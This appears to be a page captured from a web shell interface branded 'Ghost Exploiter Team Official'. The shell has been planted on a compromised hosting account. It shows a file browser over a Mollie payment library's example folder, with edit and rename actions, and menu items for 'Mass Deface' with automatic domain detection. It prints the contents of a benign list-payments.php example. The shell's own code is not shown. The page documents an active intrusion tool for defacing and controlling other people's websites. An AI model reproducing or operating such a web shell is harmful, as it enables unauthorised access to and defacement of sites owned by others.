webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
mollie
/
mollie-api-php
/
examples
/
payments
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
create-capturable-payme
...
2.395KB
edt
ren
create-ideal-payment.php
3.06KB
edt
ren
create-payment-oauth.php
2.275KB
edt
ren
create-payment.php
2.148KB
edt
ren
create-routed-payment-w
...
3.03KB
edt
ren
create-routed-payment.php
2.838KB
edt
ren
list-methods.php
0.979KB
edt
ren
list-payments.php
2.938KB
edt
ren
refund-payment.php
2.709KB
edt
ren
return.php
1.408KB
edt
ren
update-payment.php
1.43KB
edt
ren
webhook.php
1.773KB
edt
ren
<?php /* * How to list your payments. */ try { /* * Initialize the Mollie API library with your API key. * * See: https://www.mollie.com/dashboard/developers/api-keys */ require "../initialize.php"; /* * Determine the url parts to these example files. */ $protocol = isset($_SERVER['HTTPS']) && strcasecmp('off', $_SERVER['HTTPS']) !== 0 ? "https" : "http"; $hostname = $_SERVER['HTTP_HOST']; $path = dirname($_SERVER['REQUEST_URI'] ?? $_SERVER['PHP_SELF']); /* * Get the all payments for this API key ordered by newest. */ $payments = $mollie->payments->page(); echo "<ul>"; foreach ($payments as $payment) { echo "<li>"; echo "<strong style='font-family: monospace'>" . htmlspecialchars($payment->id) . "</strong><br />"; echo htmlspecialchars($payment->description) . "<br />"; echo htmlspecialchars($payment->amount->currency) . " " . htmlspecialchars($payment->amount->value) . "<br />"; echo "Status: " . htmlspecialchars($payment->status) . "<br />"; if ($payment->hasRefunds()) { echo "Payment has been (partially) refunded.<br />"; } if ($payment->hasChargebacks()) { echo "Payment has been charged back.<br />"; } if ($payment->canBeRefunded() && $payment->amountRemaining->currency === 'EUR' && $payment->amountRemaining->value >= '2.00') { echo " (<a href=\"{$protocol}://{$hostname}{$path}/refund-payment.php?payment_id=" . htmlspecialchars($payment->id) . "\">refund</a>)"; } echo "</li>"; } echo "</ul>"; /** * Get the next set of Payments if applicable */ $nextPayments = $payments->next(); if (! empty($nextPayments)) { echo "<ul>"; foreach ($nextPayments as $payment) { echo "<li>"; echo "<strong style='font-family: monospace'>" . htmlspecialchars($payment->id) . "</strong><br />"; echo htmlspecialchars($payment->description) . "<br />"; echo htmlspecialchars($payment->amount->currency) . " " . htmlspecialchars($payment->amount->value) . "<br />"; echo "Status: " . htmlspecialchars($payment->status) . "<br />"; if ($payment->hasRefunds()) { echo "Payment has been (partially) refunded.<br />"; } if ($payment->hasChargebacks()) { echo "Payment has been charged back.<br />"; } if ($payment->canBeRefunded() && $payment->amountRemaining->currency === 'EUR' && $payment->amountRemaining->value >= '2.00') { echo " (<a href=\"{$protocol}://{$hostname}{$path}/refund-payment.php?payment_id=" . htmlspecialchars($payment->id) . "\">refund</a>)"; } echo "</li>"; } echo "</ul>"; } } catch (\Mollie\Api\Exceptions\ApiException $e) { echo "API call failed: " . htmlspecialchars($e->getMessage()); }
<=Back
Liking